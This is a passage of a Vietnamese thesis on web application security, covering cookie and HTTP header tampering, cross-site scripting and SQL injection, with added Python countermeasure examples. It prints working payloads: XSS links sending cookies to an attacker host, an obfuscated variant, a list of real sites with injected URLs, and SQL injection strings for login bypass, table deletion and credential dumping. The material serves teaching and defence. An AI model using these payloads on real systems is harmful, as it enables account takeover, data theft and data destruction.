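Both countermeasures given so far in this chapter, the per-user key table of section I.2 and the keyed "pattern string" over hidden fields of section II.2, can be implemented with a keyed hash. The following is an added example, not code from the thesis, covering both: a server-side table of login keys checked against the user/key pair on the URL, and an HMAC-SHA256 signature over the hidden fields (a keyed MAC is used in place of the plain MD5 the text mentions, since an unkeyed digest can be recomputed by whoever edits the form). The URL and form values are the ones from examples 4.I.1-1 and 4.II.1-1; the parameter name key, the field name mau and all function names are this example's own.

```python
"""Binding URL parameters and hidden form fields to server-side secrets
(added example, not from the thesis)."""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit

# Per-deployment secret for signing form fields; lives only on the server.
SERVER_SECRET = secrets.token_bytes(32)

# --- Section I.2: hash table of per-user keys issued at login -----------------
USER_KEYS = {}  # username -> key (the "hash table object" of the text)


def issue_key(username):
    """Called after successful authentication; returns the key the client must echo."""
    key = secrets.token_hex(16)
    USER_KEYS[username] = key
    return key


def authorize_request(url):
    """Accept the request only if the (user, key) pair on the URL matches the table.

    Changing user=thang to user=admin fails because the key was issued to thang.
    """
    params = dict(parse_qsl(urlsplit(url).query))
    user, key = params.get("user"), params.get("key", "")
    expected = USER_KEYS.get(user)
    return expected is not None and hmac.compare_digest(expected, key)


# --- Section II.2: signed hidden fields (the "pattern string") -----------------
def sign_fields(fields):
    """Canonicalize name=value pairs in a fixed order, then MAC them with the server key."""
    canonical = urlencode(sorted(fields.items()))
    return hmac.new(SERVER_SECRET, canonical.encode(), hashlib.sha256).hexdigest()


def render_form(fields):
    """Server side: emit the fields plus the pattern-string field 'mau'."""
    signed = dict(fields)
    signed["mau"] = sign_fields(fields)
    return signed


def verify_form(submitted):
    """Server side on submit: recompute the MAC over every field except 'mau'."""
    fields = {k: v for k, v in submitted.items() if k != "mau"}
    return hmac.compare_digest(sign_fields(fields), submitted.get("mau", ""))


if __name__ == "__main__":
    k = issue_key("thang")
    print(authorize_request("http://www.nganhang.com/example?user=thang&key=%s&newpass=123" % k))
    print(authorize_request("http://www.nganhang.com/example?user=admin&key=%s&newpass=111111" % k))
    form = render_form({"giaca": "99.99"})
    tampered = dict(form, giaca="0.99")
    print(verify_form(form), verify_form(tampered))
```

Note that the signature makes tampering detectable but does not make the price secret; the text's last recommendation, keeping the real value server-side and referencing it by session ID, removes the field from the client entirely, which is the stronger design where it is possible.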

-Trang 38-

Khoa CNTT

Chng 4: Thao tc trn tham s truyn

III. THAO TC TRN COOKIE


III.1. Khi nim
phn th nht, chng 2, mc IV, lun vn trnh by c bn khi nim v cookie. Trong mc ny, lun vn ch trnh by cch thay i mt cookie. V cookie l thnh phn lu tr thng tin bo mt nht nn Cookie thng c dng lu gi trng thi cho giao thc HTTP hn l bin n form v bin URL. N cn c dng lu tr nhng thng tin ca ngi dng khi s dng ng dng v nhng d liu khc ca session. Tt c cc loi cookie nh persistent hay non-persistent, secure hay insecure u c th b thay i bi ngi dng v c gi v cho trnh ch. Do hacker c th thay i ni dung cookie ph hoi ng dng. Vi nhng cng c min ph nh Winhex th non-persistent cookie c th b thay i ni dung. Cn SSL ch c th bo v cookie trong qu trnh truyn. V d 4.III.1-1: v cookie dng lu tr thng tin cho ng dng web thng tin du lch:
Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;

The cookie states that this user is not an Admin (ADMIN=no), but what happens if the hacker changes this field? The hacker can rewrite it as follows:
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;

The hacker now plays the role of an administrator of the application.


III.2. Countermeasures


Use the session object to store important information on the server. When the application needs to check a user's information, it uses the user's sessionID to look up that information in the cache or the database. Build a mechanism that inspects the content of the cookie for invalid values, so that a forged cookie can be recognised. For example, the cookie may have the administrator flag set to true while the user sequence number in the cookie does not match the administrator's sequence number stored on the server. The last method is to encrypt the cookie. There are several encryption methods, such as symmetric (one key for both encryption and decryption) and asymmetric (two separate keys, a public key for encryption and a private key for decryption).
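The Reference String of section II.2 and the cookie check of section III.2 are the same integrity mechanism, so one added example (not code from the thesis) covers both: the names and values are joined into one string, digested with a server-side secret, and the digest is verified on every submission. It uses HMAC-SHA256 rather than the plain MD5 the text mentions, so the client cannot recompute the digest even though it sees the field values; the hidden-field name chuoi_mau, the secret and the sample values are constructed.

```python
import hashlib
import hmac

# Server-side secret; the browser never sees it. Constructed placeholder value.
SERVER_SECRET = b"replace-with-a-random-32-byte-key"


def reference_string(fields: dict, secret: bytes = SERVER_SECRET) -> str:
    """Digest of the hidden-field (or cookie) names and values.

    Names and values are joined in a fixed order with separators so that two
    different sets of values can never produce the same string. HMAC (keyed
    hash) replaces the plain MD5 mentioned in the text: knowing the field
    values is not enough to recompute the digest without the secret.
    """
    canonical = "&".join(f"{name}={fields[name]}" for name in sorted(fields))
    return hmac.new(secret, canonical.encode("utf-8"), hashlib.sha256).hexdigest()


def sign_form(fields: dict) -> dict:
    """Return the fields plus the hypothetical 'chuoi_mau' reference field."""
    signed = dict(fields)
    signed["chuoi_mau"] = reference_string(fields)
    return signed


def verify_form(submitted: dict) -> bool:
    """Recompute the digest over the submitted fields and compare it.

    compare_digest runs in constant time, so response timing does not leak
    which byte of the digest differs.
    """
    received = submitted.get("chuoi_mau")
    if received is None:
        return False
    fields = {k: v for k, v in submitted.items() if k != "chuoi_mau"}
    return hmac.compare_digest(received, reference_string(fields))


def parse_cookie(header: str) -> dict:
    """Parse 'lang=en-us; ADMIN=no; y=1' into a dict (constructed format)."""
    out = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            out[name.strip()] = value.strip()
    return out


def format_cookie(fields: dict) -> str:
    return "; ".join(f"{k}={v}" for k, v in fields.items())


def demo():
    """Hidden field from section II and the ADMIN cookie of example 4.III.1-1."""
    form = sign_form({"giaca": "99.99", "sanpham": "123"})
    tampered = dict(form, giaca="0.99")          # client edits the price
    cookie = format_cookie(sign_form({"lang": "en-us", "ADMIN": "no", "y": "1"}))
    forged = cookie.replace("ADMIN=no", "ADMIN=yes")
    return (verify_form(form), verify_form(tampered),
            verify_form(parse_cookie(cookie)), verify_form(parse_cookie(forged)))


if __name__ == "__main__":
    print(demo())  # (True, False, True, False)
```

The session-ID approach in the text remains the stronger option, since it keeps the values off the client entirely; the digest only detects tampering with values that must travel through the browser.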

IV. MANIPULATING THE HTTP HEADER


URLs, hidden form fields and cookies are all components that store information an ordinary user can view and change. All of these components, however, are transmitted through the HTTP Header. So although the HTTP Header is not itself an application parameter, every piece of information is placed in it before being sent, and this section therefore discusses how an HTTP Header can be altered.

IV.1. Concept


Normally only the browser and the server exchange HTTP Headers (see part one, chapter 2, section II for details); most web applications do not. A hacker, however, can write a program to control the HTTP header (view its content, create a new one) or use free proxies that allow the data sent from the browser to be modified. The hacker can also attack directly by using telnet to send an HTTP Request to the server. Example 4.IV.1-1:
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: www.redhat.com/login.asp
User-Agent: <!--#exec cmd="/bin/id"-->

HTTP/1.1 200 OK
Date: Mon, 17 Dec 2001 20:39:02 GMT
Server:
Connection: close
Content-Type: text/html

The part in bold is the content the hacker changed. Example 4.IV.1-2: the Referer header contains the URL of the web page from which the request was sent. Some applications therefore check this header component to make sure the request was sent from the application's own page. This is meant to stop a hacker from saving the page to disk, editing the form attributes, defeating client-side validation or server-side includes, and then submitting it. Such a check fails, however, when the hacker edits the Referer header so that the request looks as if it was sent from the legitimate page.


Referer: www.redhat.com/login.asp

IV.2. Countermeasures


Simply do not trust the HTTP header unless safety measures are in place. Headers sent by the server, such as cookies, can be encrypted. For headers sent by the client, do not rely on parameters such as referer; apply safety measures instead.

Remarks:
Important information exchanged between the browser and the server should not be stored as plain strings but must be encrypted; in addition, that information should be checked against the data in the database or in the server's cache to guard against its content being tampered with. Validating the data is also essential, since almost every attack technique relies on input supplied through the URL, hidden form fields or cookies, such as the Cross-Site Scripting attack in the next chapter or SQL Injection in chapter 6.


Chapter 5

EXECUTING INJECTED CODE IN THE VICTIM'S BROWSER


Contents:
I. Cross Site Scripting (XSS)
II. The traditional XSS attack method.
III. Some websites found to have XSS vulnerabilities.
IV. XSS attacks using Flash.
V. Prevention.


CHAPTER 5: EXECUTING INJECTED CODE IN THE VICTIM'S BROWSER (CROSS SITE SCRIPTING)

I. THE CROSS SITE SCRIPTING (XSS) ATTACK TECHNIQUE


Cross Site Scripting (abbreviated XSS) is an attack method in which pieces of code able to steal or set important information such as cookies or passwords are inserted into the source of a web application, so that they run as part of the web application and provide or carry out whatever the hacker wants. This method does not target the server but mainly attacks the user's own machine. The hacker exploits lax checking in the application and the limited knowledge of users, and also plays on their curiosity, so that users lose information easily. Typically the hacker uses the URL to hand out links that trigger client-side script, written in languages such as VBScript or JavaScript, which is executed in the victim's own browser. Example 5.I-1:
http://hotwired.lycos.com/webmonkey/00/index1.html?tw=<script>alert (document.cookie);</script>


or: http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

The part in bold is the code added in order to steal the victim's cookies. In the examples 2.I-1 above, most of the URL prefixes are the addresses of real web applications (e.g. http://www.microsoft.com/education, http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...); by abusing the way parameters are passed on the URL, a hacker can easily add code that steals the cookie. Example 5.I-1 above only illustrates the simplest way of adding code to a web page, through the URL. In reality there are many ways to add JavaScript for an XSS attack. A hacker can easily use the Document Object Model (DOM) to change the context and content of the web application. Below is a list of places where code can be inserted. Example 5.I-2:
<a href="javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
(source: http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)

The parts in bold are where code that steals information can be placed.

II. THE TRADITIONAL XSS ATTACK METHOD


Web applications usually keep important information in cookies. A cookie is a piece of information the application stores on the user's hard disk. Only the application that set the cookie can read it. So the hacker only has a chance to steal the cookie while the user is in a session with the application. After finding a vulnerability in the application, the hacker's first task is to find a page that lures the user into logging in. The steps of a traditional XSS attack:


Figure 5.II-1. How an XSS attack proceeds

Summary of the steps:
Step 1: The hacker learns that the user is using a web application with an XSS vulnerability.
Step 2: The user receives a link, by email or on the web page itself (a link created by the hacker can easily be added to a guestbook or a banner). The hacker usually catches the user's attention with phrases that excite curiosity, such as "Check your account" or "An attractive prize is waiting for you".
Step 3: The information (cookie, name, password) is sent to the hacker's server.
Step 4: The hacker creates a cgi program (in this example, steal.cgi) or a web page that records the stolen information into a file.
Step 5: With the information obtained, the hacker can break into the user's account.


Example 5.II-1: to exploit the vulnerability in the hotwired.lycos.com application, the hacker can proceed as follows:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>document.location.replace('http://www.attacker.com/steal.cgi?'+document.cookie);</script>">
Mt phn thng hp dn ang ch bn
</a>
</body>
</html>

After the user clicks the link "Mt phn thng hp dn ang ch bn", the cookie on the victim's machine is stolen and becomes the parameter passed to the hacker's steal.cgi program:
http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286
The problem is that the programmer may protect the web application by filtering special characters such as ' or + (for instance to prevent the quote from being used to run a SQL query). But the hacker can use hex codes in place of those special characters to attack, replacing ASCII characters with their hex values. Example 5.II-2:


http://www.attacker.com/steal.cgi:
h -> 0x0068
t -> 0x0074
t -> 0x0074
p -> 0x0070
: -> 0x003A
/ -> 0x002F
Below is an example of using hex codes in a web application. Example 5.II-3:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>var u = String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A);u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D);u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0073);u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x006C);u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069);u %2B= String.fromCharCode(0x003F);
u %2B=document.cookie;document.location.replace(u);</script>"
onMouseOver="window.status='http://www.hotwired.lycos.com/index2.html';return true"
onMouseOut="window.status='';return true">Mt phn thng hp dn ang ch bn
</a>
</body>
</html>

III. SOME WEBSITES FOUND TO HAVE XSS VULNERABILITIES


Company / Domain / Exploited link

NBC
http://www.shopnbc.com
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1

Microsoft
http://www.microsoft.com/
http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target=<script>alert(document.cookie)</script>

Chase
https://www.chase.com/
https://www.chase.com/chase/gx.cgi/FTcs?pagename=<script>alert(document.cookie)</script>&urlname=smallbusiness/direct

EBay
https://scgi.ebay.co.uk/
https://scgi.ebay.co.uk/saw-cgi/eBayISAPI.dll?SSLRegisterShow&countryid=3&siteId=3&co_partnerId=0&UsingSSL=1&aolemail=<script>alert(document.cookie)</script>

Oracle Japan
http://www.oracle.co.jp/
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=<script>alert(document.cookie)</script>

IV. XSS ATTACKS USING FLASH


Besides the ways of inserting a dangerous piece of code shown above, a hacker can also use flash files to steal information.


Macromedia Flash can be programmed with a scripting language built into Flash called ActionScript. ActionScript has a simple syntax similar to JavaScript, C or PERL. For example, the getURL() function calls another web page; its parameter is normally a URL such as http://www.yahoo.com. Example 5.IV-1:
getURL("http://www.yahoo.com")

However, the URL can be replaced by JavaScript:

getURL("javascript:alert(document.cookie)")

Example 5.IV-1 above pops up a message box containing the cookie of the web page that hosts the flash file. So that web page has been attacked, by inserting a piece of JavaScript into the web application through the flash file. A clearer example of this attack is the following line of code placed in the flash file, which executes when the flash file is read:
getURL("javascript:location='http://www.attacker.com?newcookie='+document.cookie")

So when a user views the web page that contains this flash file, the cookie that the page set for them is immediately sent to the hacker.


Figure 5.IV-2: Writing ActionScript in Flash

Example 5.IV-2: DeviantArt is a well-known website that lets its members upload flash files for all members to view. So a hacker can steal the cookies of members, possibly including the web administrator's account, by registering as a member of this web application, uploading a flash file to the server and waiting for victims to view it. Below is the address of a link to a flash file as presented in example 5.IV-2:
http://www.deviantart.com/deviation/1386080

Websites that allow members to submit data in HTML form, such as forums or personal signature features, can also be targets of this attack, by entering code that calls a flash file:
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
WIDTH="60" HEIGHT="48" id="1" ALIGN="">
<PARAM NAME=movie VALUE="http://www.ke_tan_cong.com/vidu.swf">
<PARAM NAME=quality VALUE=high>
<PARAM NAME=bgcolor VALUE=#FF9900>
<EMBED src="http://www.ke_tan_cong.com/vidu.swf" quality=high bgcolor=#FF9900 WIDTH="60" HEIGHT="48" NAME="1" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>

V. PREVENTION


With data and information entered by users, the designer of the web application has to carry out the following basic steps:
o Create a list of HTML tags that are allowed.
o Remove the <script> tag.
o Filter out any piece of JavaScript/Java/VBScript/ActiveX/Flash-related code.
o Filter single and double quotes.
o Filter the Null character (because a piece of code can be appended after a Null character, so that an application which has filtered the <script> tag still fails to recognise it, since the application assumes the string ends at that Null).
o Remove the characters > and <.
o Alternatively, allow special characters to be entered but encode them according to a chosen standard.
On the user's side, the browser should be configured to ask the user whether scripting languages may be executed on their machine; the user decides according to how much they trust the site.
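The steps above, in the order a defender should apply them, as an added example (not code from the thesis): NUL bytes are dropped first, so the <script> filter cannot be bypassed by a string that a C-style routine would consider terminated; then only an allowlist of tags survives, with all attributes removed, and everything else is HTML-encoded. The weak NUL-terminated filter is included only to show why the order matters. The allowlist and the sample inputs are constructed.

```python
import html
import re

# Tags the application chooses to allow (constructed allowlist).
ALLOWED_TAGS = {"b", "i", "p", "br"}

# Any tag, with or without attributes.
TAG_RE = re.compile(r"<\s*(/?)\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")
SCRIPT_BLOCK_RE = re.compile(r"<\s*script\b.*?<\s*/\s*script\s*>", re.I | re.S)


def naive_strip_script(data: str) -> str:
    """The weak filter the text warns about: it stops at the first NUL.

    A C-style string routine treats NUL as end of string, so anything after
    it is never inspected, yet the whole buffer is still sent to the browser.
    """
    visible = data.split("\x00", 1)[0]
    rest = data[len(visible):]
    return visible.replace("<script>", "").replace("</script>", "") + rest


def sanitize(data: str) -> str:
    """Apply the listed steps in a safe order.

    1. Drop NUL bytes first, so every later filter sees the whole string.
    2. Remove complete <script>...</script> blocks.
    3. Keep only allowlisted tags, stripped of attributes (this removes
       onmouseover=, style= and similar handlers); every other tag is encoded.
    4. Encode <, >, &, quotes in the remaining text so it cannot close an
       attribute or open a new tag. An unclosed <script> is handled by step 3.
    """
    data = data.replace("\x00", "")
    data = SCRIPT_BLOCK_RE.sub("", data)

    out = []
    pos = 0
    for m in TAG_RE.finditer(data):
        out.append(html.escape(data[pos:m.start()], quote=True))
        closing, name = m.group(1), m.group(2).lower()
        if name in ALLOWED_TAGS:
            out.append(f"<{closing}{name}>")          # attributes discarded
        else:
            out.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(data[pos:], quote=True))
    return "".join(out)


def is_executable_markup(rendered: str) -> bool:
    """Rough check used here: a raw <script tag or an on*= handler in a tag."""
    return bool(re.search(r"<\s*script|<[^>]*\son\w+\s*=", rendered, re.I))


if __name__ == "__main__":
    # Constructed inputs: the classic payload, the NUL-split variant, a
    # handler attribute and harmless text with allowed markup.
    samples = [
        "<script>alert(document.cookie)</script>",
        "hello\x00<script>alert(document.cookie)</script>",
        '<img src="x" onmouseover="alert(1)">',
        "<b>bold</b> & 'quoted'",
    ]
    for s in samples:
        print(repr(naive_strip_script(s)), "->", repr(sanitize(s)))
```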

Remarks:
The XSS technique is quite common and easy to apply, but the damage is limited to attacks on the victim's machine through deceptive links or forms that the hacker delivers to the victim. So, in addition to the application validating its data before use, what matters most is that users stay alert before entering a new website. It is fair to say that user vigilance achieves 90% of the security against this technique. In chapter 6, however, the attack turns against the server itself, aiming to gather information from the database and thereby seize administrative control of the application.


Chapter 6

SQL QUERY INJECTION

Contents:
I. The concept of SQL Injection
II. Introduction to the database model.
III. Attack methods.
IV. Prevention.


CHAPTER 6: SQL QUERY INJECTION (SQL INJECTION)

I. THE CONCEPT OF SQL INJECTION


SQL Injection is a way of exploiting flaws in how the web application and its database access layer are programmed. It is not a weakness of SQL Server alone but a common problem for all other databases such as Oracle, MS Access or IBM DB2. When the hacker submits data (through forms), the web application executes it and returns to the browser the result of the query or the related database error messages. From this information the hacker learns the contents of the database and from there can control the whole application system.

II. INTRODUCTION TO THE DATABASE MODEL


To present this technique better, the thesis uses a User table to illustrate the attack technique. Table User:
No. / Field name / Physical setup / Type / Size / Description
1 / tkUsername / Primary key / Text / 50 / Each user has one login account.
2 / tkPassword / / Text / 50 / Password to log in.


Convention: the programming language used for illustration in this chapter is ASP, with SQL Server as the database.

III. ATTACK METHODS


III.1. The SQL Injection attack technique
Below is the simplest SQL injection technique, used to bypass login forms. Example 6.III.1-1: suppose the web application contains the following code:
SQLQuery= "SELECT tkUsername FROM User WHERE tkUsername= '" & strUsername & "' AND Password= '" & tkPassword & "'"
flag= GetQueryResult (SQLQuery)
if flag = "" then
    check=FALSE
else
    check=TRUE
end if

The code above checks the entered Username and Password strings. If they exist in the User table then check=true, otherwise check=false. Suppose the values entered are:
Username: ' OR ''='
Password: ' OR ''='


The SQL statement is now:

SELECT tkUsername FROM User WHERE tkUsername= '' OR ''='' AND Password= '' OR ''=''

The comparison above is always true (since '' always equals ''), so the condition in the WHERE clause is always true and the username of the first row in the table is selected. This can be combined with the special SQL characters: the character ; marks the end of a query, and the characters -- hide the rest of the line after them. Example 6.III.1-2:
Username: '; drop table User--
Password:

The SQL statement is now:

SELECT tkUsername FROM User WHERE tkUsername= '';drop table User--' AND Password= '" & tkPassword & "'

With the statement above, the User table is deleted completely. Example 6.III.1-3: another example of using special SQL characters to break into the system:
Username: admin'--
Password:


The SQL statement is:

SELECT tkUsername FROM User WHERE tkUsername= 'admin'--' AND Password= '" & tkPassword & "'

The statement above allows logging into the system with admin rights without requiring a password.
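The login check of example 6.III.1-1 rebuilt by string concatenation beside the same check with query parameters, as an added example (not the thesis's ASP code). It runs the inputs of examples 6.III.1-1 and 6.III.1-3 against an in-memory SQLite copy of the User table with constructed rows; the password column is named tkPassword as in the table of section II.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory copy of the User table with constructed rows."""
    cn = sqlite3.connect(":memory:")
    cn.execute("CREATE TABLE User (tkUsername TEXT PRIMARY KEY, tkPassword TEXT)")
    cn.executemany("INSERT INTO User VALUES (?, ?)",
                   [("admin", "passofAdmin"), ("nhimmap", "passofnhimmap")])
    return cn


def login_vulnerable(cn, username: str, password: str):
    """String concatenation, the pattern of the ASP snippet in 6.III.1-1.

    Whatever the user types becomes part of the SQL text, so quotes and
    comment markers in the input change the statement's structure.
    """
    sql = ("SELECT tkUsername FROM User WHERE tkUsername='" + username +
           "' AND tkPassword='" + password + "'")
    return cn.execute(sql).fetchone()


def login_parameterized(cn, username: str, password: str):
    """Placeholders: the driver passes the values separately from the SQL
    text, so a quote in the input is compared as data, never parsed."""
    sql = "SELECT tkUsername FROM User WHERE tkUsername=? AND tkPassword=?"
    return cn.execute(sql, (username, password)).fetchone()


def run_checks() -> dict:
    """Return what each path yields for the injected and the real inputs."""
    cn = make_db()
    results = {}
    # Example 6.III.1-1: ' OR ''=' in both fields makes the WHERE always true.
    inj = "' OR ''='"
    results["vuln_or"] = login_vulnerable(cn, inj, inj)
    results["param_or"] = login_parameterized(cn, inj, inj)
    # Example 6.III.1-3: admin'-- comments out the password comparison.
    results["vuln_comment"] = login_vulnerable(cn, "admin'--", "")
    results["param_comment"] = login_parameterized(cn, "admin'--", "")
    # The legitimate credentials still work through the parameterized path.
    results["param_ok"] = login_parameterized(cn, "admin", "passofAdmin")
    results["param_wrong_pw"] = login_parameterized(cn, "admin", "x")
    return results


if __name__ == "__main__":
    for name, row in run_checks().items():
        print(f"{name:16s} -> {row}")
```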

III.2. Attacks based on the SELECT statement


Beyond the simple technique above, attacks usually rely on error messages to obtain information about tables and their fields. To do this, one must understand the error messages and adjust the input accordingly. Direct Injection: arguments that are appended to the statement without being enclosed in single or double quotes are the direct injection case. Example 6.III.2-1:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername=" & tName

Quote Injection: cases where the application places the entered argument between two single or double quotes are the Quote Injection case. Example 6.III.2-2:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername='" & tName & "'"


To neutralise the quotes and change the statement while keeping the syntax valid, the injected string must contain a single quote before the inserted characters and a single quote at the end of the statement, for instance:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername='' and ''=''"

If doing so produces an error message related to the ( character, the injected string must contain a ): Example 6.III.2-3: suppose:
StrSQL="SELECT tkUsername FROM User WHERE (tkUsername='" & tName & "')"

Then a valid syntax is as follows:
StrSQL="SELECT tkUsername FROM User WHERE (tkUsername='') or (''='')"

The % character is also often used in searches. Example 6.III.2-4:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "'"


III.3. Attacks based on the HAVING clause


HAVING, used together with the GROUP BY clause, is an effective way to obtain information about tables and fields; it is covered in more depth in section 4.

III.4. Attacks based on the UNION operator


The SELECT statement retrieves information from the database. Usually the place where something can be inserted into a SELECT statement is after WHERE. To return more rows from the table, change the condition in the WHERE clause by appending UNION SELECT. Example 6.III.4-1:
StrSQL="SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "' UNION SELECT tkPassword from User"

The statement above returns a result set that combines tkUsername with tkPassword from the User table. Note: the number of columns in the two SELECT statements must match, that is, the original SELECT and the appended UNION SELECT must have the same number of columns with the same types. The syntax error returned after inserting the UNION statement reveals the type of each field.


Below are examples carried out without knowing the contents of the database, based on HAVING, GROUP BY and UNION. Example 6.III.4-2: recall the login query:
SQLQuery= "SELECT tkUsername,tkPassword FROM User WHERE tkUsername= '" & strUsername & "' AND Password= '" & tkPassword & "'"

First, to learn the table and field names used by the query, use a having condition, as in the following example. Input value:
Username: ' having 1=1--

Resulting error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

From this error, the table used in the query is User and it contains a field named tkUsername. Next, use GROUP BY. Example 6.III.4-3:
Username: ' group by User.tkUsername having 1=1--


Resulting error:
[Microsoft][ODBC SQL Server Driver][SQL Server] Column'User.tkPassword'is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

So tkPassword is a field of the User table and is used in the query. Keep using GROUP BY until all the fields of the User table involved in the query are known. When GROUP BY no longer produces a syntax error, move on to checking the type of each field in the table. UNION is used at this point. Example 6.III.4-4:
Username: ' union select sum(tkUsername) from User--

sum computes the total of the argument in parentheses, which must be numeric. If the argument is not numeric, the following error occurs:
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

So from the error message above, tkUsername must be of type varchar.


With the method above, the type of each field in the table is easily determined. Once enough information has been gathered, the hacker can easily insert data into the User table. Example 6.III.4-5:
Username: '; insert into User(tkUsername,tkPassword) values ('admin', '')--

By adding content as in Example 6.III.4.2.4 the hacker now becomes an administrator without needing a password. Example 6.III.4-6 illustrates a procedure that lets the hacker read all the information in the User table. Step 1: create a Stored procedure that copies all the information from the two fields tkUsername and tkPassword of the User table into a single string, stored in a new table foo with one field ret, using the following code:
create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo end

Execute the statement by entering it into the form:

Username: ';create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo end--

Step 2: call the Stored procedure. After creating the stored procedure above, invoke it:
Username: ';exec test--

Step 3: use UNION to view the contents of table foo

Username: ';select ret,1 from foo union select 1,1 from foo--

Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu' to a column of data type int.

After a few steps, the hacker has obtained the contents of the User table: the names in tkUsername and the passwords in tkPassword. Step 4: the hacker can also carefully drop table foo to remove traces:
Username: '; drop table foo--

Example 6.III.4-7: here is another way to determine the contents of the User table, a search method as follows. Step 1: find the rows of the User table one at a time
Username: ' union select 1,1--


or:
Username: ' union select min(tkUsername),1 from User where tkUsername > 'a'--

Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.

The first user in the User table is admin. Step 2: to learn the next values, enter the following string:
Username: ';select min(tkUsername),1 from User where tkUsername > 'admin' union select 1,1 from User--

Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'nhimmap' to a column of data type int.

Step 3: repeat step 2 to obtain each row of the tkUsername field in the User table.


Step 4: to learn the tkPassword, proceed as follows:

Username: ';select tkPassword,1 from User where tkUsername = 'admin' union select 1,1 from User--

Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'passOfAdmin' to a column of data type int.

To learn about the tables and columns in the database, the system table INFORMATION_SCHEMA.TABLES can be queried. Example 6.III.4-8:
select TABLE_NAME from INFORMATION_SCHEMA.TABLES

INFORMATION_SCHEMA.TABLES holds information about every table on the server. The TABLE_NAME field holds the name of each table in the database.
